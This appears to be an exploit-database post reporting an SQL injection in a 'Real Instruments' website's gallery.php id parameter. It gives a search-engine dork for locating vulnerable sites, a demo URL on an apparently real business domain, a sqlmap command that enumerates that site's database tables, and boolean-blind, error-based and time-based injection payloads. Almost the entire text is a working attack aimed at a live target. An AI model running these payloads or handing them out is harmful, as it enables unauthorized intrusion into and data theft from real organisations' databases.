# Exploit Title:Real Instruments  SQL Injection
# Date:17.05.2019
# Dork :intitle:"Real Instruments"   gallery.php?id=
# Exploit Author:Cerkuday 
# Tested on:Windows &Kali Linux



#Demo:

http://www.realinstruments.ca/gallery.php?id=1


# Poc:

sqlmap -u "http://www.realinstruments.ca/gallery.php?id=1"  --text-only  --random-agent -D realinstruments --tables
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1497=1497

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=-3734 OR 1 GROUP BY CONCAT(0x71767a6b71,(SELECT (CASE WHEN (4299=4299) THEN 1 ELSE 0 END)),0x7178767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 3359=BENCHMARK(5000000,MD5(0x6a4f4b61))
---